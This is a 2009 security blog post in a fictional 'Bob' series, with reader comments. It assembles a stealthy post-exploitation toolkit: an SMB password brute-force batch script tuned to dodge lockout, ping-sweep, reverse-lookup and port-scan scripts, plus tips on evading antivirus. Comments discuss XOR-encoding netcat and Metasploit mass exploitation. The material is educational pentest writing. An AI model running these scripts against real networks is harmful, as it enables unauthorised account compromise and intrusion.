Tuesday, November 3, 2009

Bob Prepares For Action

Previously in Bob land.......



Bob's back and he's been thinking about his new playground. He's realised that if he's not careful he'll attract attention and get into trouble, so he needs to lay down some ground rules and define some goals before he goes back on the Wallifords network. If he's going to get the maximum benefit from Wallifords as a training ground rather than a playground he needs to get serious and stop recklessly throwing exploits at any old box.

Goal 1
To extract as much information about the Walliford Network as possible.

Goal 2
To identify high value targets and gain access to those systems.

Goal 3
To remain undetected.

Goal 4
To generally have fun, learn his tools and practice his techniques.


Pretty simple goals eh. Bob knows that to remain undetected he's going to have to use as many of the tools already on the compromised host as he can. He knows that he needs to use as many legitimate tools as possible and only upload those that won't be detected by AV.

Getting his tools onto the compromised hosts is important, but uploading them one by one is a pain in the arse. Then Bob remembers something he heard in a great presentation on post exploitation from Dean De Beer, a reference to a tool called Metacab. He takes a look at Metacab but decides against using it. Bob really likes the idea of Metacab but he wants a different set of tools, so he goes about making his own version. Using the Makecab tool already in XP he creates a cab file containing the few additional tools he needs, knowing he can upload and extract the files from the cab with native Windows tools straight from the command line.

The one tool he cannot do without is netcat, but AV picks it up quite easily. Then Bob remembers that his Nmap directory has ncat, a new version of netcat with loads of additional features. Bob runs it through VirusTotal to see what gives.



Perfect, only detected by one AV product out of 41. Now Bob knows that he can use this tool for file transfer, creating proxies and even backdoors. Many of the other tools he decides to include in the cab file come from the Windows Resource Kit. This means that there is very little chance of them being detected by AV or looking like Potentially Unwanted Applications (PUA) on the host.


Tools List

cmd.exe
dsadd.exe
dsget.exe
dsquery.exe
edit.com
ncat.exe
net.exe
ngrep.exe
pmon.exe
PortQry.exe
reg.exe
srvinfo.exe
WinDump.exe

As expected VirusTotal finds nothing wrong with his other tools, but then again why would it.

So looking at his tools, Bob has his ncat for backdoors and file transfer, he has a port scanner, pmon for keeping an eye on his host's CPU and memory, tools for extracting anything out of Active Directory, packet sniffers, and SrvInfo which is great for looking at details of servers. He also includes a couple of standard tools such as Net.exe and Cmd.exe which are there just in case they had been removed by the Sys Admin. Hopefully he's got everything he needs for a successful expedition into the Walliford Fries network. If not, he'll go back to the drawing board and create a new cab file.

Bob also creates a few bat files that he can use for scanning and password checks. It's easier to create these now and include them in the cab than it is to write them on the fly.

His first bat file is a simple brute-force script that will use built-in Windows functions to brute-force shares. He'll supply a user list (names.txt) and a common password list (words.txt) to the bat file. The password list will be common passwords and can be tweaked using the built-in DOS Edit tool when he's on the target, and the user lists will be generated from his enumeration tool dsquery. After running the brute-force script any successful logins will be saved to a text file (creds.txt). Bob knows from performing password audits in his other life that even when complex passwords are enforced users will still pick dumb complex passwords, such as Password01. And when it comes to change it......well of course we're looking at Password02!

Before any brute-forcing is done Bob will be checking the password policies so he doesn't trip any account lockout thresholds. So if the account lockout policy triggers after 3 incorrect attempts in half an hour, he'll just try 2 common passwords on all accounts. As they say, slow and steady wins the race.

@echo off
rem bf.bat - tries each name in names.txt with each password in words.txt
rem against one host; any pair that works is appended to creds.txt
Set /P target="Enter Target To Perform BF on:"
For /F %%i in (names.txt) do @(for /f %%j in (words.txt) do @echo %%i:%%j & @net use \\%target% %%j /u:%%i 2>nul && echo %%i:%%j >> ./creds.txt && net use \\%target% /del)


Bob will use either net.exe or dsquery.exe to populate his names.txt file. Dsquery is fantastic for ripping through Active Directory, and if you know what you're doing you can use the ds* tools to find out pretty much anything about users and computers. The beauty is, these tools can be run from any user account, so you don't need to pop an admin's box to get some juicy info.

The next bat file that Bob will include is to check for hosts that respond to a ping and output the results to a file.

@echo off
rem pingsweep.bat - one ping per address, keeping only the hosts that answer
rem (the output file name alive.txt is assumed; the post doesn't name it)
set /P subnet="Enter subnet:"
for /L %%i in (1,1,255) do @ping -n 1 -w 1 %subnet%.%%i | find "Reply" >> alive.txt



Another bat file is created to perform reverse lookups using an nslookup FOR loop.

@echo off
rem rev-lookup.bat - prints each address in the subnet that has a PTR record
set /P subnet="Enter subnet:"
For /L %%i in (1,1,255) do @nslookup %subnet%.%%i 2>nul | find "Name" && echo %subnet%.%%i



And finally a bat file to use the Portqry tool for port scans against hosts in a host file (hosts.txt). Again he can use dsquery or net.exe to populate the hosts file.

@echo off
rem port-scan.bat - PortQry against a fixed set of TCP ports for every host in hosts.txt
For /F %%i in (hosts.txt) do @PortQry.exe -n %%i -o 21,22,23,25,80,139,445,3389,1433 -p tcp

Ok, that'll do for now. Bob builds his ddf file for his cab file and creates the cab.

;*** MakeCAB Directive File for bin
;
.OPTION EXPLICIT ;*** Generate errors

.Set MaxCabinetSize=0
.Set MaxDiskSize=0

.Set CabinetNameTemplate=bin.cab

.Set DiskDirectoryTemplate=CDROM ;

.Set CompressionType=MSZIP ;

.Set UniqueFiles="OFF"

.Set Cabinet=on
.Set DiskDirectory1=bin
bf.bat
cmd.exe
dsadd.exe
dsget.exe
dsquery.exe
edit.com
hosts.txt
names.txt
ncat.exe
net.exe
ngrep.exe
pingsweep.bat
pmon.exe
port-scan.bat
PortQry.exe
reg.exe
rev-lookup.bat
srvinfo.exe
WinDump.exe
words.txt

;*** EOF




And to build his super duper cab, he makes sure all the tools, bat files and the bin.ddf file are in the same directory and.....

makecab /F bin.ddf



Perfect. After building his cab file it comes in at less than 1MB; Bob honestly couldn't be happier. He'll have to use the Windows built-in tool called Expand.exe to get his files out of the cab.

expand /F:* bin.cab .




Right, with that done Bob is almost ready to hop onto his target, put his tools to good use and start his network exploration.



Bob Builds His Custom Payloads - Part 4 .......coming next

12 comments:

Dave said...

I guess it's only a matter of time before the AVs pick up ncat. I saw a video of a live demo by muts in which he used Olly and LordPE to modify netcat.exe. The procedure involved adding a routine at the end to XOR the code. The executable was allowed to step through the routine to encode it then it was saved as netcatmod.exe.

It seemed a bit fiddly initially but, having watched it a few times, the process made sense.

Keep up the Bob stories - they're fascinating and educational!

SynJunkie said...

I'll have to hunt that video down. I had heard in the post exploitation presentation that it was pretty easy but I wanted to get to grips with ncat. I only wish it had the -z option though.

Cheers for the feedback

Syn

Anonymous said...

Very good posts indeed. Could you please give us something about metasploit automation and mass exploiting (e.g. using db_autopwn + AutoRunScript + multiscript.rb).

Also could you please explain how to exploit the target (e.g. using psexec msf module + meterpreter), then automatically run some script (i.e. using AutoRunScript), and then *immediately* close that session? I did not succeed in closing these sessions except manually using "sessions -k". Is there a way to close the session upon AutoRunScript execution end?

Please explain.

Cheers,
j

Dave said...

Try here:

hxxp://www.offensive-security.com/videos/shmoocon-presentation-2008-video/piss-on-your-av.html

Dave

hex29a said...

Another episode in the Bob story, me likey a lot :D


A note, the stock ncat.exe seems to need winpcap and visual c++ runtime installed to run..

SynJunkie said...

hex29a - Bugger! I'll have to test it tomorrow.

Looks like Bob's gonna have to use Dave's suggestion.

Thanks

SynJunkie said...

J - That's not a feature I have used before but I'll take a look and figure it out. I'm sure it can be squeezed into a Bob story at some stage ;-)

STRSHR said...

Generally, it's not that good an idea to scan things that you need on VirusTotal, because even if something isn't detected at the moment, that increases the chances that it will be detected very soon, sometimes in a matter of hours. That's because VirusTotal forwards all the stuff to antivirus vendors.

SynJunkie said...

STRSHR - That's a very good point and something I'm aware of, but in most cases the obfuscation/encoding techniques can be validated using such a service.

Good point though and something which Bob might have made clear in the post ;-)

STRSHR said...

A good alternative is http://scanner.novirusthanks.org/ , they still have a "Do not distribute the sample" option which is generally trusted to be real, the disadvantage of that site is that their definitions aren't always so bleeding edge as those on Virustotal. It's a matter of personal choice.

g3k said...

Syn,

I've been enjoying your Bob Adventures.

Got a quick question about your lab setup. What do you have running and how did you set it up?

Also a word on Metasploit. Documentation seems to be weird on how to use it... I've tried going through the Unleashed course OffSec put out, but it seems confusing, I get the basics on how to get around the program, but I'm having trouble I guess successfully attacking a target. I guess this is more of a vulnerability scanner question.

Thanks for the awesome posts, keep them up!

-g3k

SynJunkie said...

g3k - My lab's pretty complicated. It's a mixture of Parallels and the Xen infrastructure (the free version that supports 5 servers). Basically the Xen server is an old laptop that has mostly server VMs on, and the clients are usually Parallels VMs. I also use a netbook as my main attacking platform which is a dual-boot XP and BackTrack 4. It works pretty well as I only spin stuff up as I need it.

Regarding your MSF trouble, if I can help I will. Are you attacking physical to virtual or virtual to virtual? I found I always get better results using my netbook as the attacking box. Whenever I attacked a virtual host from a virtual host I always got unpredictable results.

I'm working on the next few Bob posts, I'm just trying to come up with something interesting and worthwhile that might be useful to someone other than myself.

Any questions about MSF, you can hit me up with an email.

Cheers

Syn